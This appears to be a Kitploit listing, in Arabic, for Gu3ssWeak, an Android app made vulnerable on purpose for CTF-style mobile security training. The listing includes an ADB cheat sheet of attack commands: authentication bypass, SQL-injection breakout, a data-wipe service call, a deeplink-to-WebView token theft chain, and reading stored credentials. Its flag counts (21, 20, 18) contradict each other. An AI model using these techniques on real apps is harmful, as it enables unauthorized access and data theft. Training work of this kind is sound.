Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Gu3ssWeak — تطبيق Android معرّض للثغرات بشكل متعمد لأبحاث أمن التطبيقات الجوّالة وممارسة مكافآت الثغرات - OWASP Mobile Top 10 | Kitploit
أدوات/GitHubGitHub/b4sith-sec/gu3ssweak
أمان أندرويدتحليل الثغرات الأمنيةاختبار اختراق تطبيقات الجوالاستغلال تطبيقات الويبCTFاختبار الاختراقأمن الجوالالتعلم والتعليممسارات ودورات التعلممختبرات وتدريب عملي
GitHubb4sith-sec/gu3ssweak
8216منذ 9 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Gu3ssWeak

تطبيق Android معرّض للثغرات بشكل متعمد لأبحاث أمن التطبيقات الجوّالة وممارسة مكافآت الثغرات - OWASP Mobile Top 10

عرض المستودع

Gu3ssWeak

تطبيق Android ضعيف بشكل متعمد لأبحاث أمن الهواتف المحمولة، وممارسة صيد الثغرات، والتعلم بأسلوب CTF. يحتوي على 21 ثغرة موثقة مرتبطة بـ OWASP Mobile Top 10.


البدء السريع

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

شغّل التطبيق، وتنقّل عبر كل مختبر، والتقط الأعلام (flags)، ثم أرسلها على لوحة نتائج CTF داخل التطبيق.


فئات المختبرات

الفئةالثغراتالأعلام
WebViewWV-01 إلى WV-055
DeeplinkDL-01 إلى DL-04، DL-CHAIN5
Auth / SQL InjectionSQL-011
Admin PanelAP-01 إلى AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 إلى BR-032
ServiceSV-01، SV-02a، SV-02b2
Network InterceptionNET-011
Banking / OTPOTP-011
LFILFI-011
StorageSTORE-011
XSSXSS-01، XSS-022

إجمالي 20 علماً، بالإضافة إلى علم رئيسي يُمنح عند التقاطها جميعاً.


لقطات الشاشة

قائمة المختبراتلوحة نتائج CTF
lab

سير عمل CTF

  1. افتح التطبيق - ينتقل مباشرة إلى قائمة المختبرات.
  2. اختر مختبراً، واستغل الثغرة (عبر واجهة المستخدم، أو ADB، أو كليهما).
  3. كل استغلال ناجح يلتقط علمه تلقائياً.
  4. اضغط "Submit Flag" للتأكيد، أو تحقق من التقدم على "CTF Scoreboard".
  5. التقط جميع الأعلام الـ 18 لفتح العلم الرئيسي.

التوثيق

  • ARCHITECTURE.md - كيف يعمل كل مكوّن ضعيف داخلياً
  • MITIGATIONS.md - إرشادات الإصلاح والمعالجة لكل ثغرة، بما في ذلك مفاهيم تصعيد LFI إلى RCE
  • SECURITY.md - سياسة الأمان والإفصاح المسؤول
  • CHECKSUMS.txt - مجاميع تحقق SHA256 لملفات APK المبنية

ورقة غش استغلال ADB

# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

Admin panel - bypass the "fixed" auth check via forged intent extra

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

ContentProvider grant bypass - parenthesis breakout escapes the single-row grant

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Watch for logged secrets
adb logcat | grep Gu3ssWeak

إخلاء المسؤولية

هذا المشروع تعليمي بحت. جميع الثغرات متعمدة وموثقة. تنطبق التقنيات المعروضة هنا على تطبيقات حقيقية، لكن لا تختبر إلا الأنظمة التي تملكها أو المصرّح لك باختبارها. راجع SECURITY.md للاطلاع على إخلاء المسؤولية الكامل وإرشادات الإفصاح المسؤول.

الترخيص

MIT - راجع LICENSE.

تنزيل الأداة